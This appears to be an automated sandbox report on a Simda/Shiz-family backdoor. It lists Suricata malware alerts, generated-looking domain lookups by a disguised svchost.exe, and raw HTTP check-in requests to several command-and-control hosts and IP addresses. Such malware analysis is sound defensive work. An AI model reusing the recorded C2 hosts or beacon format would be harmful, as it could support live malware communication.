Source: Network traffic	Suricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.5:62489
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:63521 -> 154.85.183.50:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:63521 -> 154.85.183.50:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:63519 -> 103.224.212.210:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:63519 -> 103.224.212.210:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:63535 -> 15.197.240.20:80
Source: Network traffic	Suricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.5:63695
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:63535 -> 15.197.240.20:80
Source: Network traffic	Suricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.5:52863
Source: Network traffic	Suricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.5:53531
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:62686 -> 72.52.179.174:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:62686 -> 72.52.179.174:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:63520 -> 15.197.240.20:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:63520 -> 15.197.240.20:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:62684 -> 64.225.91.73:80
Source: Network traffic	Suricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.5:57825
Source: Network traffic	Suricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.5:62631
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:63517 -> 64.225.91.73:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:59535 -> 3.94.10.34:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:59538 -> 69.162.80.57:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:62684 -> 64.225.91.73:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:59535 -> 3.94.10.34:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:59538 -> 69.162.80.57:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:63517 -> 64.225.91.73:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:59540 -> 91.195.240.19:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:63522 -> 103.224.182.252:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:63522 -> 103.224.182.252:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:50850 -> 64.225.91.73:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:50850 -> 64.225.91.73:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:59533 -> 18.208.156.248:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:59533 -> 18.208.156.248:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:59530 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:59530 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:61321 -> 103.224.212.210:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:61321 -> 103.224.212.210:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:59545 -> 85.17.31.122:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:50851 -> 154.85.183.50:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:50851 -> 154.85.183.50:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:59545 -> 85.17.31.122:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:50852 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:59534 -> 199.191.50.83:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:59534 -> 199.191.50.83:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:50852 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:59546 -> 172.234.222.143:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:50844 -> 103.150.11.230:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:59546 -> 172.234.222.143:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:49369 -> 52.34.198.229:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:49369 -> 52.34.198.229:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:50842 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:50842 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.34.198.229:80 -> 192.168.2.5:49369
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:50843 -> 18.208.156.248:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:59547 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.34.198.229:80 -> 192.168.2.5:49369
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:50843 -> 18.208.156.248:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:59547 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:50844 -> 103.150.11.230:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:60101 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:60101 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:59528 -> 162.255.119.102:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:59531 -> 172.234.222.143:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:59531 -> 172.234.222.143:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:59528 -> 162.255.119.102:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:59536 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:50849 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:59536 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:50849 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:61322 -> 15.197.240.20:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:59544 -> 154.212.231.82:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:59544 -> 154.212.231.82:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:61322 -> 15.197.240.20:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:59532 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:59532 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:59541 -> 85.17.31.122:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:59541 -> 85.17.31.122:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:50853 -> 103.224.182.252:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:50853 -> 103.224.182.252:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:59537 -> 208.100.26.245:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:59537 -> 208.100.26.245:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.5:59529 -> 3.64.163.50:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:59529 -> 3.64.163.50:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:49721 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:49723 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:50846 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:49737 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:60696 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:59543 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:59539 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.5:50848 -> 188.114.96.3:443

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\apppatch\svchost.exe	Domain query: lysyvan.com
Source: C:\Windows\apppatch\svchost.exe	Domain query: puzymig.com
Source: C:\Windows\apppatch\svchost.exe	Domain query: vocydof.com
Source: C:\Windows\apppatch\svchost.exe	Domain query: lyrysyj.com
Source: C:\Windows\apppatch\svchost.exe	Domain query: volymaf.com
Source: C:\Windows\System32\svchost.exe	Domain query: qexylup.com
Source: C:\Windows\System32\svchost.exe	Domain query: qetysuq.com
Source: C:\Windows\apppatch\svchost.exe	Domain query: lyvytuj.com

Queries Google from non browser process on port 80

Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyfyj.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: www.gahyqah.com Connection: Keep-Alive Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET / HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww1.lysyfyj.com Connection: Keep-Alive Cookie: sid=a5fae49c-616e-11ef-add0-e1f04491a098 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupydeq.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupycag.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupydeq.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galynuh.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
